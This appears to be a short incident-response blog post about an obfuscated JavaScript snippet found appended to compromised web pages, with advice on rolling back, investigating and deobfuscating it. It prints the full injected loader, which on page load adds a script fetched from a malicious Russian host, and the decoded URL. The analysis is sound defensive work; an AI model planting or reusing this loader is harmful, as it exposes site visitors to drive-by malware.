I was asked to look into web pages which had the following code appended to them:
<script>var t="";var h="";var G;if(G!='m'){G=''};var D_="";function C() {var S='';var J="";var K=window;var V;if(V!='O'){V=''};var R=String("scri"+"pt");var iq="";var Z;var r='';var A;if(A!=''){A='zH'};var Fl=new String();var E=String("g");var L="appmnQi".substr(0,3)+"end"+"Chinrc7".substr(0,3)+"ldxiDU".substr(0,2);var b=new String("]");var f;if(f!='' && f!='Qp'){f=null};var z=RegExp;var GU;if(GU!='I' && GU!='lb'){GU=''};this.JL="";var bT;if(bT!=''){bT='px'};function N(q,p){var d="[";var nm;if(nm!='il' && nm != ''){nm=null};d+=p;d+=b;var oF;if(oF!='So' && oF != ''){oF=null};var w=new z(d, E);this.ze='';return q.replace(w, r);};var wk;if(wk!='e'){wk=''};this.Ns='';var i="onl"+"oad";var dz;if(dz!='no'){dz='no'};this.wa='';var LO='';var O_='';var u=N('sqr4cp','5pqQ4xa7');var D="defeANm0".substr(0,4)+"r";this.g='';this.Vw='';Z=function(){this.ZF='';try {var Gf;if(Gf!='uW' && Gf != ''){Gf=null};n=document.createElement(R);var RV=new String();var Yo;if(Yo!='' && Yo!='fF'){Yo='ib'};var v=new Array();n[D]=[1,8][0];var gY='';var gYj='';n[u] = N('hGtQtGpW:H/j/jpYoHkjeGsjaWcYkG.YrQuY:j','GYjQWH')+N('8295634772434270642295791948166996914660733561217215135','65174293')+N('/DgXoVoEg5lReL.6cMoXm5/jt9eIcWh4nIo4r9aWtLiR.Wc5o3mR/Wi5c9iMb6a9.WcRo3mI.4p9hXp5','I36Xj9VE4W5RDLM');var XG;if(XG!='' && XG!='vi'){XG=null};var II='';var Q=new String("bodyOc6".substr(0,4));var QA;if(QA!='' && QA!='wq'){QA='JJ'};var Oa;if(Oa!='' && Oa!='hH'){Oa='Od'};var yK=new String();var Zy;if(Zy!='' && Zy!='MB'){Zy=null};var uu;if(uu!='' && uu!='nE'){uu=null};document[Q][L](n);var fR;if(fR!='U' && fR != ''){fR=null};} catch(H){this.EW="";var x_=new Date();};this.YM='';};K[i]=Z;var vr="";this.kR='';var Jf;if(Jf!='of' && Jf != ''){Jf=null};};var Wd=new Array();var UK;if(UK!='HZ' && UK!='uz'){UK=''};C();var KqP=new String();</script>
On its face, you recognize that this is an unauthorized change. Kick in your incident response procedure. Roll back this change. Learn how the unauthorized change occurred. Suspect configuration errors. Suspect vulnerable code, rebuild using updated software. Make sure it doesn’t happen again.
It may prove important to know what the code does. Feed that code into jsbeautifier, jsunpack or wepawet. You learn that it opens a link to:
http://pokesack.ru:8080/google.com/technorati.com/iciba.com.php
It may prove important to know what happens when that link is opened. Don’t expect to give a definitive judgement. The code behind the link can be changed frequently. However, you can use wget or curl to collect a sample of the page.
Aggressive Virus Defense 